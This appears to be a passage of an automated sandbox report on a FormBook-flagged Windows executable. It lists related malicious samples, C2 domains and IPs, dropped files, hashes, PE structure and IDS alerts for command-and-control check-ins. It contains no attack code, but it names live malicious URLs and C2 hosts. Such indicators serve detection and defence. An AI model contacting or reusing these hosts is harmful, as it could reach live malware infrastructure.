                                                                                                                                                                              • www.8auvih.top/iwsn/?gLc=954R46Wvx7n5T5KmTAnXXU7c5sLMP21esxIuNAnYAqeAvOaVtLyGHXgDG+9pDjEdQAJe3x02PhQzxke8Oe2Iq6h+ey0690ZMgK9npYwF/LLyY1w9way6Y1E=&6fQ=evG0
                                                                                                                                                                              Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.8auvih.top/iwsn/
                                                                                                                                                                              Contract.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.8auvih.top/pd8n/

                                                                                                                                                                              Domains

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              www.cesach.netSALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • 217.76.156.252

                                                                                                                                                                              ASNs

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              CLOUDFLARENETUSPO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                              • 104.21.74.191
                                                                                                                                                                              ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                              File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                              PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                              • 104.21.74.191
                                                                                                                                                                              PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              HETZNER-ASDEwZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 144.79.90.34
                                                                                                                                                                              http://199.59.243.227Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 188.40.167.81
                                                                                                                                                                              na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 46.4.195.6
                                                                                                                                                                              jew.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 78.46.244.4
                                                                                                                                                                              INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • 95.216.25.89
                                                                                                                                                                              la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 193.25.170.240
                                                                                                                                                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 88.198.164.142
                                                                                                                                                                              la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 116.203.104.203
                                                                                                                                                                              V9fubyadY6.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                              • 195.201.57.90
                                                                                                                                                                              XS_Trade_AI-newest_release_.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 135.181.116.240
                                                                                                                                                                              AMAZON-02USOrder pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              Proforma Fatura ektedir.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              Order Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                              • 52.217.116.65
                                                                                                                                                                              SuNMTBkfPo.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 108.137.225.79
                                                                                                                                                                              Proforma Fatura ektedir.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                              • 185.166.143.50
                                                                                                                                                                              Order Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              B6eg13TpEH.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 18.140.171.43
                                                                                                                                                                              vHnFyxemFf.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 18.182.10.178
                                                                                                                                                                              j3Lr4Fk7Kb.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 34.217.56.254
                                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                              • 18.244.18.122
                                                                                                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSOrden de Compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              Orden de compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              W6Z9uSRsKQ.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 20.57.7.175
                                                                                                                                                                              wZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 51.125.244.193
                                                                                                                                                                              Transferencia.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.253.45
                                                                                                                                                                              SuNMTBkfPo.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 104.46.238.240
                                                                                                                                                                              8v2IShmMos.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 40.106.170.125
                                                                                                                                                                              Orden de Compra No. 434565344657.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              B6eg13TpEH.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 51.153.54.236

                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                              No context

                                                                                                                                                                              Dropped Files

                                                                                                                                                                              No context

                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment&WarantyBonds.exe.log

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\Payment&WarantyBonds.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\4648H9mUM

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\SysWOW64\systeminfo.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              Static File Info

                                                                                                                                                                              General

                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Entropy (8bit):7.950809546708747
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                              File name:Payment&WarantyBonds.exe
                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                              MD5:a9da1b42f6ad80ee6085f69e6c25f49b
                                                                                                                                                                              SHA1:e7f51c3eb496a278999fd893e1fcfca8a685f854
                                                                                                                                                                              SHA256:4e6fe41b2158546ebc7d5dcfe13aa832e3ce5025b36e0cfcc9d7f373e1a0a089
                                                                                                                                                                              SHA512:da5a50aee37e977f3af7bd7af90d91245d42197978d9a8b016558989d6999a1448d44095b61b164fa7a2f7374b338e29cf0efe3be40a125f782930898dca8162
                                                                                                                                                                              SSDEEP:12288:H8aDPw1Qk89Tmyij4kIqGNlSq8UMb7SmUdiJEYqXmSEwILV4C4BWpDatCEftp2uF:HdLw9gTFsOqGHFqvUwJEYJSEp4C44pDa
                                                                                                                                                                              TLSH:5DF4238273EE4711D47E6BF52EA2164453B66749092BF66C4FAC00CC6FA6B004D5AF1B
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!g..............0.................. ........@.. ....................................@................................

                                                                                                                                                                              File Icon

                                                                                                                                                                              Icon Hash:4bd4d4d4d4d6d629

                                                                                                                                                                              Static PE Info

                                                                                                                                                                              General

                                                                                                                                                                              Entrypoint:0x4bafda
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x6721A484 [Wed Oct 30 03:14:12 2024 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:4
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                              Instruction
                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al

                                                                                                                                                                              Data Directories

                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xbaf880x4f.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x1720.rsrc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                              Sections

                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                              .text0x20000xb8fe00xb90002681d2cd27ec28f4bdba76764ce7023eFalse0.9540500950168919data7.95788200827039IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .rsrc0xbc0000x17200x18007fcbb9d7315293f588ab54c4c8fbedf4False0.7862955729166666data6.9286601127334855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .reloc0xbe0000xc0x2002e0b8e9b6825d01448eab31c2eb3e274False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                              Resources

                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                              RT_ICON0xbc0c80x12cfPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9123572170301142
                                                                                                                                                                              RT_GROUP_ICON0xbd3a80x14data1.05
                                                                                                                                                                              RT_VERSION0xbd3cc0x350data0.4009433962264151

                                                                                                                                                                              Imports

                                                                                                                                                                              DLLImport
                                                                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                                                                              Network Behavior

                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                              2024-10-30T08:10:32.954880+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4497413.33.130.19080TCP
                                                                                                                                                                              2024-10-30T08:10:32.954880+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497413.33.130.19080TCP
                                                                                                                                                                              2024-10-30T08:10:50.202498+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449794103.120.80.11180TCP
                                                                                                                                                                              2024-10-30T08:10:52.752803+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449810103.120.80.11180TCP
                                                                                                                                                                              2024-10-30T08:10:55.113557+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449826103.120.80.11180TCP
                                                                                                                                                                              2024-10-30T08:10:57.668868+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449840103.120.80.11180TCP
                                                                                                                                                                              2024-10-30T08:10:57.668868+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449840103.120.80.11180TCP
                                                                                                                                                                              2024-10-30T08:11:03.748001+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449876217.160.0.6080TCP
                                                                                                                                                                              2024-10-30T08:11:06.297814+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449890217.160.0.6080TCP
                                                                                                                                                                              2024-10-30T08:11:08.869961+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449904217.160.0.6080TCP
                                                                                                                                                                              2024-10-30T08:11:11.413201+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449918217.160.0.6080TCP
                                                                                                                                                                              2024-10-30T08:11:11.413201+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449918217.160.0.6080TCP
                                                                                                                                                                              2024-10-30T08:11:17.480354+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449954161.97.142.14480TCP
                                                                                                                                                                              2024-10-30T08:11:20.001402+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449969161.97.142.14480TCP
                                                                                                                                                                              2024-10-30T08:11:22.550127+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449985161.97.142.14480TCP
                                                                                                                                                                              2024-10-30T08:11:25.122859+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450000161.97.142.14480TCP
                                                                                                                                                                              2024-10-30T08:11:25.122859+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450000161.97.142.14480TCP
                                                                                                                                                                              2024-10-30T08:11:30.980430+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002013.248.169.4880TCP
                                                                                                                                                                              2024-10-30T08:11:33.545456+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002113.248.169.4880TCP
                                                                                                                                                                              2024-10-30T08:11:36.187303+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002213.248.169.4880TCP
                                                                                                                                                                              2024-10-30T08:11:38.753227+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45002313.248.169.4880TCP
                                                                                                                                                                              2024-10-30T08:11:38.753227+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45002313.248.169.4880TCP
                                                                                                                                                                              2024-10-30T08:11:44.898287+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450024198.251.84.20080TCP
                                                                                                                                                                              2024-10-30T08:11:47.490413+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450025198.251.84.20080TCP
                                                                                                                                                                              2024-10-30T08:11:49.932895+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450026198.251.84.20080TCP
                                                                                                                                                                              2024-10-30T08:11:52.581487+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450027198.251.84.20080TCP
                                                                                                                                                                              2024-10-30T08:11:52.581487+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450027198.251.84.20080TCP
                                                                                                                                                                              2024-10-30T08:11:58.333652+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450028172.67.154.6780TCP
                                                                                                                                                                              2024-10-30T08:12:00.880361+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450029172.67.154.6780TCP
                                                                                                                                                                              2024-10-30T08:12:03.455281+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450030172.67.154.6780TCP
                                                                                                                                                                              2024-10-30T08:12:06.047015+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450031172.67.154.6780TCP
                                                                                                                                                                              2024-10-30T08:12:06.047015+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450031172.67.154.6780TCP
                                                                                                                                                                              2024-10-30T08:12:15.299563+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003220.2.249.780TCP
                                                                                                                                                                              2024-10-30T08:12:17.871433+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003320.2.249.780TCP
                                                                                                                                                                              2024-10-30T08:12:20.486991+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003420.2.249.780TCP
                                                                                                                                                                              2024-10-30T08:12:22.879079+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45003520.2.249.780TCP
                                                                                                                                                                              2024-10-30T08:12:22.879079+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45003520.2.249.780TCP
                                                                                                                                                                              2024-10-30T08:12:30.309501+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450036203.161.49.19380TCP
                                                                                                                                                                              2024-10-30T08:12:32.868097+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450037203.161.49.19380TCP
                                                                                                                                                                              2024-10-30T08:12:35.417291+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450038203.161.49.19380TCP
                                                                                                                                                                              2024-10-30T08:12:37.957230+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450039203.161.49.19380TCP
                                                                                                                                                                              2024-10-30T08:12:37.957230+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450039203.161.49.19380TCP
                                                                                                                                                                              2024-10-30T08:12:43.809745+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450040199.59.243.22780TCP
                                                                                                                                                                              2024-10-30T08:12:46.357760+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450041199.59.243.22780TCP
                                                                                                                                                                              2024-10-30T08:12:48.895001+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450042199.59.243.22780TCP
                                                                                                                                                                              2024-10-30T08:12:51.443226+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450043199.59.243.22780TCP
                                                                                                                                                                              2024-10-30T08:12:51.443226+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450043199.59.243.22780TCP
                                                                                                                                                                              2024-10-30T08:12:57.609084+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450044217.76.156.25280TCP
                                                                                                                                                                              2024-10-30T08:13:00.169619+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450045217.76.156.25280TCP
                                                                                                                                                                              2024-10-30T08:13:02.751785+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450046217.76.156.25280TCP
                                                                                                                                                                              2024-10-30T08:13:05.362313+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450047217.76.156.25280TCP
                                                                                                                                                                              2024-10-30T08:13:05.362313+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450047217.76.156.25280TCP
                                                                                                                                                                              2024-10-30T08:13:11.643333+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450048144.76.190.3980TCP
                                                                                                                                                                              2024-10-30T08:13:14.252584+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450049144.76.190.3980TCP
                                                                                                                                                                              2024-10-30T08:13:16.688104+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450050144.76.190.3980TCP
                                                                                                                                                                              2024-10-30T08:13:19.252594+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450051144.76.190.3980TCP
                                                                                                                                                                              2024-10-30T08:13:19.252594+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450051144.76.190.3980TCP
                                                                                                                                                                              2024-10-30T08:13:25.393989+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005234.92.128.5980TCP
                                                                                                                                                                              2024-10-30T08:13:28.199291+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005334.92.128.5980TCP
